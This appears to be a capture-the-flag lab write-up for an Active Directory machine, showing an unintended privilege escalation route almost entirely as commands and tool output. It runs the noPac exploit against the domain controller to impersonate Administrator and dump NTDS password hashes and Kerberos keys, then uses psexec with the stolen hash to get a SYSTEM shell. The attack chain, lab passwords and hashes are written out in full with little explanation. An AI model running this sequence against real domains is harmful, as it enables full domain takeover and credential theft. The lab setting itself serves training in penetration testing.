Priv Esc Unintended Route
*Evil-WinRM* PS C:\Users\enox> ls Desktop
Directory: C:\Users\enox\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/20/2021 4:12 AM application
-a---- 8/29/2024 3:31 AM 34 local.txt
-a---- 5/27/2021 7:03 AM 239 todo.txt
*Evil-WinRM* PS C:\Users\enox\Desktop> cd application
*Evil-WinRM* PS C:\Users\enox\Desktop\application> ls
Directory: C:\Users\enox\Desktop\application
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/20/2021 4:12 AM templates
-a---- 5/26/2021 7:26 PM 927 app.py
*Evil-WinRM* PS C:\Users\enox\Desktop\application> download app.py
Info: Downloading C:\Users\enox\Desktop\application\app.py to app.py
$ netexec smb 192.168.241.165 -u enox -p california -M nopac 
$ echo 192.168.241.165 DC01 heist.offsec DC01.heist.offsec | sudo tee -a /etc/hosts python noPac.py heist.offsec/enox:california -dc-ip 192.168.241.165 -dc-host DC01 --impersonate Administrator -dump -just-dc-user Administrator -use-ldap
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target DC01.heist.offsec
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-1INBA7FFXVS$"
[*] MachineAccount "WIN-1INBA7FFXVS$" password = WXlyzE%)3WZm
[*] Successfully added machine account WIN-1INBA7FFXVS$ with password WXlyzE%)3WZm.
[*] WIN-1INBA7FFXVS$ object = CN=WIN-1INBA7FFXVS,CN=Computers,DC=heist,DC=offsec
[*] WIN-1INBA7FFXVS$ sAMAccountName == DC01
[*] Saving a DC's ticket in DC01.ccache
[*] Reseting the machine account to WIN-1INBA7FFXVS$
[*] Restored WIN-1INBA7FFXVS$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_DC01.heist.offsec.ccache
[*] Attempting to del a computer with the name: WIN-1INBA7FFXVS$
[-] Delete computer WIN-1INBA7FFXVS$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b325100ee400c16d56c42f9685381139:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:d4e135e862ea6eae8575861230af84537d6dfa12720e328644822c20b2e911bf
Administrator:aes128-cts-hmac-sha1-96:8a9270d02cbbf911389a41b84af0cc5c
Administrator:des-cbc-md5:f84ae602a7c776b9
[*] Cleaning up...
$ impacket-psexec [email protected] -hashes :b325100ee400c16d56c42f9685381139
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra
[*] Requesting shares on 192.168.241.165.....
[*] Found writable share ADMIN$
[*] Uploading file bboxsecA.exe
[*] Opening SVCManager on 192.168.241.165.....
[*] Creating service kijW on 192.168.241.165.....
[*] Starting service kijW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
DC01
nt authority\system
85d080fc22be19102c6e513f40686380
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::bc21:839e:775:80d3%7
IPv4 Address. . . . . . . . . . . : 192.168.241.165
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.241.254
Last updated